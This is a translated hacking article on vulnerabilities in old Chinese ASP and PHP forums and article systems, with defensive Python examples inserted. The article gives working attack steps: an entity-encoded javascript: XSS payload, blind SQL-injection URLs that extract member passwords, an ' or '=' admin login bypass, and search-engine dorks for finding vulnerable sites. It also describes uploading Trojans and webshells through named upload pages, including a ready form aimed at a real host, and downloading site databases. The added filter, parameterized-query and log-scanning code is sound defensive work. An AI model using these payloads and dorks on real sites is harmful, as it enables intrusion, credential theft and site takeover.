Veteran's New Story: Exploitation of Various Vulnerabilities and Research of Some Search Parameters

Source: Internet
Author: User
Tags: md5, md5 encryption, web, database
Exploitation of Various Vulnerabilities and Some Search Parameters

When it comes to vulnerabilities, the first thing to mention is the web upload vulnerability.

The Dynamic Network upload vulnerability opened the prologue to file upload vulnerabilities; the vulnerabilities in other systems followed.

Vulnerability analysis of the ASP Dynamic Network forum

1. This vulnerability is not too serious. Anyone who uses the Dynamic Network forum knows that JavaScript written directly into a post is filtered by splitting the word, and that writing HTTP automatically turns it into a link. The vulnerability is right here: in these two places, turn one letter of the word into its encoded form, and the system decodes it back into the letter, which achieves the goal of avoiding the filter. For example, write the following when posting:

[img]javas&#x63ript:window.open('htt&#x70://www.fwcn.com','')[/img]

Look closely: &#x63 decodes to the letter "c", &#x70 decodes to the letter "p", the & plays the connecting role, and finally the [img] tag makes the JS trigger. If the forum supports Flash insertion, [swf] works as well. This vulnerability can be used for some mischief: write a tempting topic, and whoever clicks on it lands on your homepage (cheating click rates, advertising); worse still, connect it to a virus or Trojan page. This vulnerability exists in various versions of Dynamic Network, including the newer version 0519, so the affected area is wide. I think the illegal characters should be detected and removed rather than simply split, and I really hope the Dynamic Network developers patch this vulnerability as soon as possible.
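As an added example (not code from the original post or from the Dynamic Network forum), here is a defender-side check in Python that reproduces the weak "look for the word javascript" filter described above and sets it beside a filter that decodes HTML entities before checking and only allows http/https URLs inside [img] tags. The sample posts, the host example.invalid and the function names are constructed for this demo.

```python
import html
import re

# Constructed sample posts using the forum's [img]...[/img] markup (not real forum data).
SAMPLE_POSTS = {
    "plain_image": "[img]http://example.invalid/pic.gif[/img]",
    # the encoded form described above: one letter of 'javascript' and of 'http' as a hex entity
    "encoded_js": "[img]javas&#x63ript:window.open('htt&#x70://example.invalid','')[/img]",
    # the same trick with a decimal entity
    "decimal_js": "[img]java&#115;cript:alert(1)[/img]",
    "bare_js": "[img]javascript:alert(1)[/img]",
}

IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)


def naive_filter_allows(url):
    """The behaviour the post describes: look for the literal word 'javascript' in the raw text."""
    return "javascript" not in url.lower()


def normalize_url(url):
    """Decode HTML entities until the text stops changing (conservative against double
    encoding), then strip ASCII whitespace and control characters, which browsers ignore
    inside a URL scheme."""
    previous, current = None, url
    while current != previous:
        previous, current = current, html.unescape(current)
    return re.sub(r"[\x00-\x20\x7f]", "", current)


def hardened_filter_allows(url):
    """Allow-list approach: after normalization the URL must start with http:// or https://."""
    normalized = normalize_url(url).lower()
    return normalized.startswith(("http://", "https://"))


def check_post(post, allows):
    """Apply a filter to every [img] URL in a post; returns one True/False verdict per tag."""
    return [allows(url) for url in IMG_TAG.findall(post)]


def compare_filters(posts=SAMPLE_POSTS):
    """For each sample post, report (naive verdicts, hardened verdicts)."""
    return {name: (check_post(p, naive_filter_allows), check_post(p, hardened_filter_allows))
            for name, p in posts.items()}


if __name__ == "__main__":
    for name, verdicts in compare_filters().items():
        print(name, verdicts)
```

The naive filter lets both entity-encoded posts through because it never sees the word it is looking for; the hardened filter decodes first and then asks the only question that matters, whether the scheme is one we want to render. Rejecting everything that is not http/https is what removing the illegal content, rather than splitting it, looks like in practice.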

2. Compared with the first, the second vulnerability is a big problem: it can be used to crack the passwords of all registered members of the forum (horror~~~). Forum administrators usually take the forum program as-is and use it, and this convenience directly leads to the vulnerability. Take a look at the web database and you know the password field is UserPassword. Suppose we want to crack the password of the user ABC. First view ABC's user data; the link is http://xxxxx/dispuser.asp?name=abc. In dispuser.asp, the statement that reads the parameter is

username=trim(request("name"))

and the database query is

sql="select * from [user] where username='"&username&"'"

so ABC is passed directly as the username parameter of dispuser.asp. In addition, if the user does not exist, the program gives a hint. Given this, we can write a password-query condition: after where username='abc', add and userpassword="Hu Jintao". In theory this cracks the password, but guessing like that would take until who knows what year. Now it is the turn of the VBScript functions. First use the len function to try out the number of characters in the user's password; the address is written as

http://xxxxx/dispuser.asp?name=abc'%20and%20len(userpassword)=5%20and%20'1'='1

That may not be easy to understand; put into the SQL statement it actually looks like

sql="select * from [user] where username='abc' and len(userpassword)=5 and '1'='1'"

Now it is clearer: %20 is a space, and the single quote after abc and the single quotes in '1'='1 are all there to make the SQL statement match up. Strange, "the user does not exist"? That means the user does not satisfy this condition; keep changing the 5 to 6, 7, 8 and so on, and as soon as the user's data is displayed, the number of password characters has been guessed right.

The next thing to do is to try each character of the password, still using VBScript; the left, right or mid functions will do:

http://xxxxx/dispuser.asp?name=abc'%20and%20left(userpassword,1)='A

If the user information is shown, the guess is right; if the "user does not exist" hint is shown, the guess is wrong. This is still too slow, so bring out the asc function:

http://xxxxx/dispuser.asp?name=abc'%20and%20asc(mid(userpassword,1,1))>'50

This tests whether the ASCII code of the user's password character is greater than 50. Keep narrowing the range and I believe it soon comes down to a single value. Did that surprise you into a cold sweat? At least it did me. Relying on flexible use of a few functions, the password can, conservatively speaking, be cracked within half an hour. Fortunately, the Dynamic Network developers adopted MD5 encryption in the later 05** versions, which is finally a relief, but many sites in China still use old versions of the Dynamic Network forum (including a fairly well-known Flash site).

3. Dynamic Network SQL statement vulnerability
This vulnerability is for the SQL version of Dynamic Network.
Test method: at http://ip/bbs/admin_index.asp, enter ' or '=' as the username and the same as the password.
This lets you skip authentication.
Principle: it uses SQL syntax. The entered password and ID become a legitimate SQL statement that skips authentication directly.
This vulnerability is not specific to Dynamic Network; many SQL-backed ASP programs have it.
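The root cause in sections 2 and 3 is the same: the username and password are concatenated into the SQL string, exactly as in the dispuser.asp query quoted above. The following Python/sqlite3 example is added here and is not the forum's code; it builds an in-memory stand-in for the [user] table (constructed rows), then runs the concatenated query beside a parameterized one using the ' or ''=' login input and the '1'='1 condition from this page. Function names are my own.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the forum's Access database (two fake accounts)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table [user] (username text, userpassword text)")
    conn.executemany("insert into [user] values (?, ?)",
                     [("abc", "s3cret"), ("admin", "hunter2")])
    return conn


def lookup_user_vulnerable(conn, name):
    # Same shape as the page's dispuser.asp: sql="select * from [user] where username='"&username&"'"
    sql = "select * from [user] where username='" + name + "'"
    return conn.execute(sql).fetchone()


def lookup_user_safe(conn, name):
    # The value travels as a bound parameter, so quotes inside it are data, not SQL syntax.
    return conn.execute("select * from [user] where username=?", (name,)).fetchone()


def login_vulnerable(conn, name, password):
    # Concatenated login check of the kind section 3 describes for admin_index.asp.
    sql = ("select * from [user] where username='" + name +
           "' and userpassword='" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, name, password):
    row = conn.execute("select * from [user] where username=? and userpassword=?",
                       (name, password)).fetchone()
    return row is not None


def demo():
    """Run both variants against the same inputs and return the verdicts."""
    conn = make_db()
    bypass = "' or ''='"              # the classic form of the ' or '=' login input on this page
    injected_name = "abc' and '1'='1"  # the tautology the dispuser.asp write-up uses
    return {
        "vuln_login_bypassed": login_vulnerable(conn, bypass, bypass),
        "safe_login_bypassed": login_safe(conn, bypass, bypass),
        "safe_login_real": login_safe(conn, "admin", "hunter2"),
        "vuln_lookup_injected": lookup_user_vulnerable(conn, injected_name),
        "safe_lookup_injected": lookup_user_safe(conn, injected_name),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

With concatenation the bypass input turns the WHERE clause into username='' or ''='' and userpassword='' or ''='' which is always true, and the injected name executes the appended condition; with bound parameters the same strings simply fail to match any row. The fix in classic ASP is the same idea (ADODB.Command with parameters) and does not depend on MD5 or any other password hashing, which only limits the damage after a leak rather than preventing the injection.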

4. Dynamic Network Forum SP2 vulnerability (the scope of this vulnerability is very large: Dynamic Network's official site, Hacker Line of Defense and Security Base were all hacked this way; you can search Baidu for the details)
Upload vulnerability paths: reg_upload.asp and upfile.asp



Qing Chuang article system

Open Google and enter .tw qcdn (or search Baidu for powered by:qcdn_news, but most of those are Chinese sites).
Upload vulnerability: append /admin_upfile.asp to the URL. If the following appears:

Microsoft VBScript runtime error '800a01b6'
Object doesn't support this property or method: 'Form'
/article/admin_upfile.asp, line 21

there is a better than 90% chance of success. Use the Guilin Veteran upload tool to upload a Trojan.
After intrusions started, admin_upfile.asp was changed. You can also change it to user_upfile.asp together with a Traditional-Chinese-encoded Trojan. Another way is to add admin_upfile.asp and user_upfile.asp to the injection tool.

Qing Chuang (Green Create) article management system: injection privilege escalation
Keyword: "list.asp?unid="
Tools:
1. NBSI; most hacker sites seem to have it.
2. Md5crack2, software for cracking MD5 hashes (Lei recommends the DOS tool dv.exe as easier to use).
The first detection reports "No injection vulnerability detected"; then enter "Unid" in "signature character".
(Hint: the "U" in "Unid" must be capitalized.)




"Dragon article management system" vulnerability

Dragon Article Management System Ver 2.0 build 20040620 official version exploit
Search for the keyword "article.asp?artid="
The vulnerable files are
admin_upfile.asp
user_upfile.asp
These two files are "upfile.asp", a reappearance of the Dynamic Network vulnerability.
Add "artid=1111" to the cookie when uploading.



Exploitation of the phpwind 1.3.6 forum vulnerability
Search keyword "power by phpwind v1.3.6"

The "group sharing" feature of the phpwind 1.3.6 forum has an upload.

After saving, the Trojan address is faq.php under the current directory.

Submit the following form from your own machine:
<form enctype="multipart/form-data" action="http://1717t.78cm.com/faq.php" method="POST">
<input name="MyFile" type="file">
<input value="submit" type="submit">
</form>
After a successful upload the Trojan exists in the forum directory.
Just access it directly!



Vulnerability collection

1. Co Net MiB ver1.0~4.0: log in as administrator with ' or ' = ' or ' (a classic vulnerability)

2. ASP calendar vulnerability: search Google for "maintained with the Ocean12 ASP Calendar Manager v1.01". The program's default database is O12cal.mdb (no MD5 encryption; passwords are saved in plaintext).

3. The lottery vulnerability: open www.baidu.com or www.google.com and search for "please verify membership material".
Take http://www.3589.com/tian/4login.asp and change 4login.asp to conn.inc:

<%
dbpath=server.mappath("Wz520#.mdb")
set conn=server.createobject("ADODB.Connection")
conn.open "driver={microsoft access driver (*.mdb)};dbq="&dbpath
%>

Wz520#.mdb is the database. Change the # to %23 and the database can be downloaded.


4. Blue Create (Qing Chuang) article system: serious flaw. Append /admin_upfile.asp to the URL to upload a webshell.

Search Baidu for powered by:qcdn_news, or for Taiwan .tw qcdn.

You can also use %5c to expose the database path (the "bauku" trick).

"list.asp?unid=" and ".tw/list.asp?unid=" have injection; enter "Unid" in "signature character"
(the "U" in "Unid" must be capitalized)

5. Free Power 3.6: the software's upload filtering is not strict; modify the upload with WinHex.exe and WSockExpert.exe to upload a Trojan.

E Times post vulnerability
Search Baidu for "E Times Inn"
Exploit page: /upload.asp; use the Veteran tool to upload directly.

Boiling News System upload vulnerability
Search: Boiling Outlook News System [core: Worldly Elegance] authorized use
Vulnerability: spaces are not strictly restricted.
Therefore, select the ASP Trojan for upload directly, then add a space after it.
Its upload file is uploadfaceok.asp.
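Most of the patterns in this collection leave traces in a web server's access log: POSTs to the *_upfile.asp and upload endpoints named above, direct requests for .mdb files (with # encoded as %23), %5c path probes, and query strings carrying len/asc/mid conditions. The following Python scanner is an added example, not part of the original article. The log lines are constructed in a simplified "date time method target status" layout, the endpoint list is taken from the file names this page mentions, and the rule names are my own.

```python
import re
from urllib.parse import unquote

# Constructed access-log sample (not a real log) in a simplified
# "date time method target status" layout; %20 and %23 are kept encoded, as a server logs them.
SAMPLE_LOG = """\
2005-01-01 10:00:01 GET /bbs/dispuser.asp?name=abc 200
2005-01-01 10:00:02 GET /bbs/dispuser.asp?name=abc'%20and%20len(userpassword)=5%20and%20'1'='1 200
2005-01-01 10:00:03 GET /bbs/dispuser.asp?name=abc'%20and%20asc(mid(userpassword,1,1))>'50 200
2005-01-01 10:00:04 POST /article/admin_upfile.asp 200
2005-01-01 10:00:05 GET /tian/Wz520%23.mdb 200
2005-01-01 10:00:06 GET /bbs/list.asp?unid=12 200
2005-01-01 10:00:07 POST /bbs/admin_index.asp 302
2005-01-01 10:00:08 GET /bbs/images/%5c 500
"""

# Upload endpoints named in the article (admin_upfile.asp, user_upfile.asp, upfile.asp,
# reg_upload.asp, upload.asp, uploadfaceok.asp), matched on the decoded path.
UPLOAD_ENDPOINTS = re.compile(r"/(?:[a-z0-9_]*upfile|reg_upload|upload|uploadfaceok)\.asp$", re.I)
# A quote closing the intended string, a boolean operator, then one of the VBScript/Access
# functions the blind-guessing write-up relies on (len, asc, mid, left, right).
BLIND_PROBE = re.compile(r"'\s*(?:and|or)\b.*?\b(?:len|asc|mid|left|right)\s*\(", re.I)


def classify_request(method, target):
    """Return the list of attack patterns a single request matches (empty list if none)."""
    raw_path, _, raw_query = target.partition("?")
    # decode before matching so %20 becomes a space and %23 becomes '#'
    path, query = unquote(raw_path), unquote(raw_query)
    reasons = []
    if method.upper() == "POST" and UPLOAD_ENDPOINTS.search(path):
        reasons.append("post-to-upload-endpoint")
    if path.lower().endswith(".mdb"):
        reasons.append("access-database-download")
    if BLIND_PROBE.search(query):
        reasons.append("blind-sql-injection-probe")
    if "\\" in path or "\\" in query:  # %5c decodes to a backslash
        reasons.append("backslash-path-error-probe")
    return reasons


def scan_log(text):
    """Return (time, method, target, reasons) for every suspicious line in the log text."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        _date, time, method, target, _status = line.split()
        reasons = classify_request(method, target)
        if reasons:
            findings.append((time, method, target, reasons))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(*finding)
```

Decoding before matching is the important step: a rule that looks for a literal "len(" never fires on the %20-encoded line, and the .mdb rule never fires on Wz520%23.mdb until %23 is turned back into #. Note the limits too: the admin_index.asp login bypass travels in a POST body, which access logs do not record, so that one needs application-side logging rather than this scanner.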
